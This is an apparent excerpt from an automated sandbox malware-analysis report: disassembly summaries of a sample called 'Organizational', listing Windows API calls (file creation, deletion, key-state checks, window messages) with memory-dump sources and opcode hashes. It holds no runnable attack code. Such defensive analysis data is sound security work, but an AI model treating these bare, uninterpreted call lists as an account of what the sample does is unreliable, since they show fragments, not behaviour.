                                                          • Opcode ID: cb7b9a1fb4138505bff0294fa836551aa44d0e85946817b99bea7b0301807188
                                                          • Instruction ID: 76361271a0efd0c49633788515235ebb0dcef5f96450027a300d6d7a74c69d49
                                                          • Opcode Fuzzy Hash: cb7b9a1fb4138505bff0294fa836551aa44d0e85946817b99bea7b0301807188
                                                          • Instruction Fuzzy Hash: 1D118E718183019BC311EF69EC4998AFBFCEF98310F00891AF44487261DFB09596CF95
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00263E72,?,?,?,00000000), ref: 00264327
                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00263E72,?,?,?,00000000), ref: 002A0717
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: dc6c842ef382e0a53a61c6e20eed67a790e88b2dfee4d206501d061f72109cca
                                                          • Instruction ID: 7c37895422e18e926cf05317f53c3c975c7e14c342064a4feb283c768fb9e559
                                                          • Opcode Fuzzy Hash: dc6c842ef382e0a53a61c6e20eed67a790e88b2dfee4d206501d061f72109cca
                                                          • Instruction Fuzzy Hash: CB018470194249BEF3252E148CCAFA67A9CAB01768F20C255FAD46A1D0C6F05CA59B14
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: 11c6bba212661d3720d1baa7be01c83d21b07335045f5cb93a4c0f31c2d98d07
                                                          • Instruction ID: d6ebf661b2c75d848f78d1f5f2d08ce6abcfad75fd1099f034ec81dc74409ad9
                                                          • Opcode Fuzzy Hash: 11c6bba212661d3720d1baa7be01c83d21b07335045f5cb93a4c0f31c2d98d07
                                                          • Instruction Fuzzy Hash: 91014471C60659EBCF11AF66CC0599EBBA1EF80360F18C115F82C5A1A1D7B18A71DF92
                                                          APIs
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          • __lock_file.LIBCMT ref: 0027560B
                                                            • Part of subcall function 00276E3E: __lock.LIBCMT ref: 00276E61
                                                          • __fclose_nolock.LIBCMT ref: 00275616
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: d2665c9f179b42209856330fce0f2463f18b0d4cb6dc7be12690319abdd0dda7
                                                          • Instruction ID: 12b085d9f01de8b9457ea40fa13bcd8cf460df606ed0fa0b83c6da782efbafb3
                                                          • Opcode Fuzzy Hash: d2665c9f179b42209856330fce0f2463f18b0d4cb6dc7be12690319abdd0dda7
                                                          • Instruction Fuzzy Hash: 6CF09071831B259AD721AF75880AB6EB7A1AF41334F55C209E42CAB1C1CFFC89219F51
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00275EB4
                                                          • __ftell_nolock.LIBCMT ref: 00275EBF
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2999321469-0
                                                          • Opcode ID: 276209685ff784639308e7004f4230c87e0dccfa010c01c5d9ab315890b05467
                                                          • Instruction ID: 7c1002b8a2c5a5a49a72d74b49697719350f23ca9dd50e56a160c4a65e77969a
                                                          • Opcode Fuzzy Hash: 276209685ff784639308e7004f4230c87e0dccfa010c01c5d9ab315890b05467
                                                          • Instruction Fuzzy Hash: FFF0A732971A259BE710BB74880675EB2906F01335F11C206E02CEB1C1CFB88A229F51
                                                          APIs
                                                          • _memset.LIBCMT ref: 00265AEF
                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00265B1F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell__memset
                                                          • String ID:
                                                          • API String ID: 928536360-0
                                                          • Opcode ID: 0c4fac5675e14e32f43543ed2398b522eb148e56bbf2165d4d384c788b84010d
                                                          • Instruction ID: 62c634dd48a671e772d0be711d72f045cd98b7db3ad32a6ea90cd11175af7c1e
                                                          • Opcode Fuzzy Hash: 0c4fac5675e14e32f43543ed2398b522eb148e56bbf2165d4d384c788b84010d
                                                          • Instruction Fuzzy Hash: A1F0A7708183189FD793CF24EC897E577BC970430CF0441E9AA4896296D7B10BD9CF55
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadString$__swprintf
                                                          • String ID:
                                                          • API String ID: 207118244-0
                                                          • Opcode ID: a42a1bc2554128b6374980d81805da19c608eb0990fd7bfffec0f0f9e76036dc
                                                          • Instruction ID: 754af123e2c2da6eef4f78929ea23700694c4294234ab4b4725473115eddcded
                                                          • Opcode Fuzzy Hash: a42a1bc2554128b6374980d81805da19c608eb0990fd7bfffec0f0f9e76036dc
                                                          • Instruction Fuzzy Hash: 44B15D74A2010ADFCB14EF94D891EEEB7B5FF48310F24815AF91AA7291DB70A961CF50
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002641B2
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          APIs
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          APIs
                                                            • Part of subcall function 00264B29: FreeLibrary.KERNEL32(00000000,?), ref: 00264B63
                                                            • Part of subcall function 0027547B: __wfsopen.LIBCMT ref: 00275486
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002627AF,?,00000001), ref: 002649F4
                                                            • Part of subcall function 00264ADE: FreeLibrary.KERNEL32(00000000), ref: 00264B18
                                                            • Part of subcall function 002648B0: _memmove.LIBCMT ref: 002648FA
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          APIs
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          APIs
                                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00263CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00264276
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          APIs
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          APIs
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          APIs
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                          • _memset.LIBCMT ref: 002B7CB4
                                                          Similarity
                                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 525207782-0
                                                          APIs
                                                          Similarity
                                                          • API ID: _fseek
                                                          • String ID:
                                                          • API String ID: 2937370855-0
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,?,002627AF,?,00000001), ref: 00264A63
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          APIs
                                                          Similarity
                                                          • API ID: __fread_nolock
                                                          • String ID:
                                                          • API String ID: 2638373210-0
                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                          • Instruction ID: 452bf2676476387e11d185af8e9d2cdf0799ba31bf30c454473b3b89daaab623
                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                          • Instruction Fuzzy Hash: 7AF0587241020DFFDF04CF80C941EAABB79FF04314F208189F8188A212D772DA61AB91
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002709E4
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: 2f8f9866f722dbf7fd75b46175b91f7f51fe9f6621e1d936819b387f0bf14f67
                                                          • Instruction ID: 22e599ebb178a39835f910d9f6703f1427692419764cc41d99d991fb58b90761
                                                          • Opcode Fuzzy Hash: 2f8f9866f722dbf7fd75b46175b91f7f51fe9f6621e1d936819b387f0bf14f67
                                                          • Instruction Fuzzy Hash: F5E0863691022857C721A6989C45FEA77EDDF89690F0401B6FC08D7244D961ACE28AD1
                                                          APIs
                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002B4D31
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FolderPath_memmove
                                                          • String ID:
                                                          • API String ID: 3334745507-0
                                                          • Opcode ID: f6723728b4d62993bcb7b81be925313ec0e0f42c2fe5946cc1f68b1139022afb
                                                          • Instruction ID: 23fb08db996e4552f5a9572042c5d696b1bff19a586afba5212a9c961ad9efa5
                                                          • Opcode Fuzzy Hash: f6723728b4d62993bcb7b81be925313ec0e0f42c2fe5946cc1f68b1139022afb
                                                          • Instruction Fuzzy Hash: 64D05EA591032C2BEB64E6A4AC8DDB77BACD744220F0006A17C5CC3141E964AD958AE0
                                                          APIs
                                                            • Part of subcall function 002B384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,002B3959,00000000,00000000,?,002A05DB,00308070,00000002,?,?), ref: 002B38CA
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,002A05DB,00308070,00000002,?,?,?,00000000), ref: 002B3967
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: fd414f500cb4afd4cdc84467e7cc0726f2d24f0d77edadd5fa605b5c37bf8c98
                                                          • Instruction ID: 30442a000e5f9b14d993a5f2dd6eb658d625b6b2f2a2cd58488186fa8f4767a9
                                                          • Opcode Fuzzy Hash: fd414f500cb4afd4cdc84467e7cc0726f2d24f0d77edadd5fa605b5c37bf8c98
                                                          • Instruction Fuzzy Hash: AEE04F35410208BBD720EF94D805ADAB7BCEF05320F00455AFD4095111D7B29E249B91
                                                          APIs
                                                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002B3E7D,?,?,?), ref: 002B3F0D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: f0ca5270415a765de9f4ad533311c6a491d4f07d52ab3d459bd577e640ff82fc
                                                          • Instruction ID: 2818f895a226997d70298cc7a1ff14175f47ee2105124537642f5dca1a8e46de
                                                          • Opcode Fuzzy Hash: f0ca5270415a765de9f4ad533311c6a491d4f07d52ab3d459bd577e640ff82fc
                                                          • Instruction Fuzzy Hash: 46D0A7315E020CBBEF50DFA0DC46F68B7ACE701706F1002E4BA04D90E0DAB2691497A5
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,002A06E6,00000000,00000000,00000000), ref: 002642BF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 61262e3e784d21ccdeb3450dc0e545b780a569c69e3dff44a9061cfc30b26464
                                                          • Instruction ID: 5fc8c88298fb48f25a7aa43f3318dcb88bd67a204654c3c2369a7f26e337afb6
                                                          • Opcode Fuzzy Hash: 61262e3e784d21ccdeb3450dc0e545b780a569c69e3dff44a9061cfc30b26464
                                                          • Instruction Fuzzy Hash: 7CD0C77464020CBFE710CB80DC46FA9777CE705711F100194FD046A290D6F27D508795
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: c9d9a2ae173fbff7e7b22d161cb3dc37a222c4c5c9120ed3b0e4a90f7887f018
                                                          • Instruction ID: a1dec809a5d054092b1a07d14b57884a043199bcb19edf2e1c1b851476a0e5d2
                                                          • Opcode Fuzzy Hash: c9d9a2ae173fbff7e7b22d161cb3dc37a222c4c5c9120ed3b0e4a90f7887f018
                                                          • Instruction Fuzzy Hash: 0BB09234062642569D282E3C29CC0E9330158423E97D81B81E4788E8E2923988ABA520
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: 86e36adafb0fcbae76d3e012b17cf6c9e4adb6cae52154e5a9ee946503c5abeb
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: 39B0927644020C77CE012E82EC03A597B29AB40668F408020FB0C1C162A6B3A6B09A89
                                                          APIs
                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 002BD842
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          • Opcode ID: 4e8a6294f4d0bb7ed5a46b17ea8b8f93158faf9b1d61bcc564b52bb847298e91
                                                          • Instruction ID: 5edaffe03e0b6468cfb8604c2082926b8eda48df8092b080337bdcc7c501fb9a
                                                          • Opcode Fuzzy Hash: 4e8a6294f4d0bb7ed5a46b17ea8b8f93158faf9b1d61bcc564b52bb847298e91
                                                          • Instruction Fuzzy Hash: 907165302247428FC714EF64D491AEEB7E1AF88355F04462DF896972A2DB30ED69CF52
                                                          APIs
                                                            • Part of subcall function 002B4005: FindFirstFileW.KERNEL32(?,?), ref: 002B407C
                                                            • Part of subcall function 002B4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 002B40CC
                                                            • Part of subcall function 002B4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002B40DD
                                                            • Part of subcall function 002B4005: FindClose.KERNEL32(00000000), ref: 002B40F4
                                                          • GetLastError.KERNEL32 ref: 002BC292
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2191629493-0
                                                          • Opcode ID: 8ff69ce59e03087d3685231b2af83ff5ed559a60eb7f469acdf695b101002111
                                                          • Instruction ID: 05dda92454dc413338073de22f69bdc9d4c98b5fdf40f0e435ae1de734d7a90b
                                                          • Opcode Fuzzy Hash: 8ff69ce59e03087d3685231b2af83ff5ed559a60eb7f469acdf695b101002111
                                                          • Instruction Fuzzy Hash: 5BF0A7312202104FCB14FF59D884F59B7E5AF84364F058459F9058B352CB74BC51CF94
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,?,00000000,00292F8B), ref: 002642EF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 9648ba7eda4399f9b5b43c1c6c0c90c2ed20c22b5265c9d46dae97c2613271f0
                                                          • Instruction ID: 1957b0a9c824f9e92673e3bac8207054224ba5117364601cc89b2f7471267502
                                                          • Opcode Fuzzy Hash: 9648ba7eda4399f9b5b43c1c6c0c90c2ed20c22b5265c9d46dae97c2613271f0
                                                          • Instruction Fuzzy Hash: 06E09275410B02CFC3315F1AE814416FBE4FFE13613214A2FE4E6926A0D3B058AA8B90
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002DD208
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DD249
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002DD28E
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DD2B8
                                                          • SendMessageW.USER32 ref: 002DD2E1
                                                          • _wcsncpy.LIBCMT ref: 002DD359
                                                          • GetKeyState.USER32(00000011), ref: 002DD37A
                                                          • GetKeyState.USER32(00000009), ref: 002DD387
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DD39D
                                                          • GetKeyState.USER32(00000010), ref: 002DD3A7
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DD3D0
                                                          • SendMessageW.USER32 ref: 002DD3F7
                                                          • SendMessageW.USER32(?,00001030,?,002DB9BA), ref: 002DD4FD
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002DD513
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002DD526
                                                          • SetCapture.USER32(?), ref: 002DD52F
                                                          • ClientToScreen.USER32(?,?), ref: 002DD594
